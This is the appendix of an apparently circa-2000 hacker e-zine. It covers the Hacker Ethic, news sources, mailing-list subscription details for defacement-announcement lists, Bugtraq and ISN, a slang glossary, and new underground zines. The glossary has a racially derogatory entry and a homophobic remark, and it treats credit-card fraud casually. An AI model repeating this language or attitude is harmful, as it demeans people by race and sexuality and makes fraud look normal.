|_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. @HWA A.5 Sources *** (VERY incomplete) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News site.........................http://www.ukhackers.com/ *NEW* News site.........................http://www.hackernews.com.br/ *NEW* News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ *News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ General Security/Exploits.........http://packetstorm.securify.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org News/Technology ..................http://www.technologyevaluation.com/ * HNN Also archives back issues of their news, use the following url format http://www.hackernews.com/arch.html?012700 where 01=Jan 27=Date 00=Year. They are archived here also as part of the compilation and broad archival concept we are trying to maintain with this publication. - Ed + Various mailing lists and some newsgroups, such as ... + other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... see http://hwa-security.net links section for more. http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq win2kbugtraq <+others> @HWA A.6 Resources ~~~~~~~~~ Pulled for reworking. EoF A.7 Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed A.8 Mailing list Info ~~~~~~~~~~~~~~~~~ Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th 1999) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA A.9 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit.like when you're kb'd from our chans for being gay its TFS, *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. A.11 NEW Underground E-Zines ~~~~~~~~~~~~~~~~~~~~~~~ New releases: SET Saqueadores Edición Técnica: http://www.set-ezine.org f41th magazine issue 12 is out.: http://f41th.com/index2.html Digital Defiance 5 (!) is out..: http://www.hackers.cx New zines on the scene: InET.......................... http://www.warpedreality.com/inet Hack In the Box............... http://www.thelimit.net/hitb Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt DataZine...................... http://www.tdcore.com Napalm........................ http://napalm.firest0rm.org/ Digital Defiance.............. http://www.hackers.cx b0g .......................... http://www.b0g.org @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999, 1900 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- 2000 (k)